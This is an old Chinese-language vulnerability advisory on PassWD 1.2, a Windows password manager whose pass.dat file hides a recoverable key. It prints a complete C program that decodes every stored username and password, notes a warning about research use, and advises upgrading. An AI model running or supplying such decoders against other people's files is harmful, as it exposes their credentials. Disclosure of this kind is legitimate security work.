发布日期：2000-06-06
更新日期：2000-06-06

受影响系统：

    PassWD PassWD 1.2
       - Microsoft Windows 98
       - Microsoft Windows 95
       - Microsoft Windows NT 4.0

描述：

---

    PassWd 1.2是一个口令管理工具，用于保存到各种URLs的用户登录信息，比如用
    户名、口令以及链接，保存在在PassWD安装目录下的pass.dat文件中。遗憾的是，
    这些信息采用了很弱的加密机制保存在pass.dat文件中，存在一个key可以解码
    所有被保存的口令。

    <* 来源：Daniel Roethlisberger admin@roe.ch *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
*  Decoder for PassWD v1.2 `pass.dat' password files
*
*  Written 2000 by Daniel Roethlisberger <admin@roe.ch>
*
*  This code is hereby placed in the public domain.
*  Use this code at your own risk for whatever you want.
*
*  The decoded data is not parsed in any way - it should
*  be very easy to moderately experienced programmers
*  to add that themselves.
*
*/

#include <stdio.h>

void main(int argc, char *argv[])
{
   unsigned char charpos;
   FILE* outfile;
   FILE* infile;
   unsigned char a;
   unsigned char b;
   unsigned char key;
   unsigned char x;

   unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@AB
   CDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !
   \"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdef
   ghijklmnopqrstuvwxyz{|}~";

   printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
   printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
      return;
   }

   infile = fopen(argv[1], "r");
   if(infile == NULL)
   {
      printf("Could not open file %s\n", argv[1]);
      return;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "w");
      if(outfile == NULL)
      {
         printf("Could not write to file %s\n", argv[2]);
         _fcloseall();
         return;
      }
   }

   getc(infile);       /* jump over decoy byte    */
   a = getc(infile);   /* read encoded key byte 1 */
   b = getc(infile);   /* read encoded key byte 2 */

   if(b == EOF)
   {
      printf("ERROR - encountered EOF within header\n");
      return;
   }

   /* this line `decodes' the key */
   key = (unsigned char)((a - 'b') * 10 + (b - 'b'));

   /* read through infile and dump decoded output to outfile: */
   x = getc(infile);
   while(!feof(infile))
   {
      for(charpos = 0; x != charset[charpos]; charpos++)
      {
         if(charpos > 99)
         {
            printf("\nERROR - encountered illegal character in source file\n");
            _fcloseall();
            return;
         }
      }
      /* plain = cypher - key */
      putc(charset[charpos + 99 - key], outfile);
      x = getc(infile);
   }

   if(argc == 2)
      printf("\n\n");
   printf("Done.\n");

   _fcloseall();
   return;
}


建议：

---

暂时考虑升级到 PassWD 2000 并删除旧的 pass.dat 文件。


浏览次数：6406
严重程度：0（网友投票）